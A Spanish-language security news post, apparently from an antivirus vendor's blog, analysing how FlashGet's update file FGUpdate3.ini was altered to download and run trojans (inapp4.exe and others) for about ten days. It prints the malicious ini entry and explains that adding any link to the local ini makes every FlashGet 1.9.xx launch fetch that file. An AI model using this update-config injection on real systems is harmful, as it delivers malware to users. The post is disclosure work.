News

TrojanGet causa infecciones en todo el mundo

Hace unos días comenzamos a recibir mensajes de usuarios diciendo que su programa antivirus detectaba troyanos en el directorio de Flashget directory.

Nuestros análisis mostraron que el problema afectaba a usuarios de FlashGet de todo el mundo. Archivos llamados inapp4.exe, inapp5.exe, e inapp6.exe (que Kaspersky Anti-Virus detecta como Trojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezxo y Trojan-Dowloader.Win32.Agent.kht) aparecieron en los ordenadores de las víctimas.

Lo más extraño fue que no se detectó ningún otro troyano que podría haber descargado los archivos nocivos al sistema. Es más, los sistemas operativos y navegadores de algunos usuarios afectados estaban al día en sus actualizaciones. Entonces, ¿Cómo ingresaron los programas nocivos a sus ordenadores?

Lo primero que notamos fue la ubicación de los troyanos: el directorio de FlashGet. Haciendo un análisis más cercano, nos dimos cuenta de que se había creado o modificado la fecha del archivo FGUpdate3.ini hace poco tiempo (las diferencias con el original están en azul):

[Add] fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031

[AddEx] [fgres1.ini] url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif] url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%

[inapp4.exe] url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

Según información que encontramos en la red, la primera infección se detectó el 29 de febrero. El último caso que hemos escuchado ocurrió el 9 de marzo. Esto significa que un programa legítimo actuó como un Trojan-downloader por 10 días, instalando y ejecutando troyanos desde su propio sitio.

Los troyanos se han eliminado del sitio, y FGUpdate3.ini (que también se descarga al ordenador del usuario por Internet) ha vuelto a la normalidad.

Entonces, ¿Cómo se convirtió FlashGet en un Trojan-Downloader? Hay una explicación obvia: algún hacker alteró el sitio, sustituyó el archivo de configuración estándar y le agregó un enlace a un troyano dentro del mismo sitio. No está claro por qué el hacker no usó otro sitio. Tal vez lo hizo para que su ataque fuera más sigiloso, pues si un enlace en el archivo de configuración dirige a FlashGet es menos probable que levante sospechas. Decidimos probar si se puede usar esta técnica para descargar cualquier archivo del sitio. ¿El resultado? Sí, se puede.

Todo lo que debe hacer es añadir un enlace (que puede dirigir al archivo que usted desee) al archivo FGUpdate3.ini y lo descargará de forma automática a su ordenador cada vez que ejecute FlashGet. Aunque no presione “Actualizar”, FlashGet usa la información del archivo .ini. Todas las versiones de FlashGet 1.9.xx tienen esta “vulnerabilidad”.

Así que, aunque el sitio ya no está alterado, los usuarios siguen vulnerables. Cualquier programa troyano podría modificar el archivo local .ini FlashGet y hacer que actué como un Trojan-Downloader. Muchos usuarios incluyen a FlashGet en su lista de sitios confiables, lo que significa que el sitio puede realizar cualquier actividad en Internet e ingresar a cualquier sitio sin que el usuario reciba alerta alguna.

Hasta ahora, los vendedores de FlashGet de China no han dado su respuesta oficial. La razón del incidente sigue sin conocerse y no se garantiza que no vuelva a suceder. Los usuarios pueden sacar sus propias conclusiones… y tomar las medidas que crean necesarias.

TrojanGet causa infecciones en todo el mundo

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

 

Informes

MosaicRegressor: acechando en las sombras de UEFI

Encontramos una imagen de firmware de la UEFI infectada con un implante malicioso, es el objeto de esta investigación. Hasta donde sabemos, este es el segundo caso conocido en que se ha detectado un firmware malicioso de la UEFI usado por un actor de amenazas.

Dark Tequila Añejo

Dark Tequila es una compleja campaña maliciosa que tiene por objetivo a los usuarios ubicados en México, con el propósito principal de robar información financiera, así como credenciales de acceso a sitios populares que van desde versionado de código fuente a cuentas de almacenamiento de archivos en línea y de registro de dominios web.

De Shamoon a StoneDrill

A partir de noviembre de 2016, Kaspersky Lab observó una nueva ola de ataques de wipers dirigidos a múltiples objetivos en el Medio Oriente. El programa malicioso utilizado en los nuevos ataques era una variante del conocido Shamoon, un gusano que tenía como objetivo a Saudi Aramco y Rasgas en 2012.

Suscríbete a nuestros correos electrónicos semanales

Las investigaciones más recientes en tu bandeja de entrada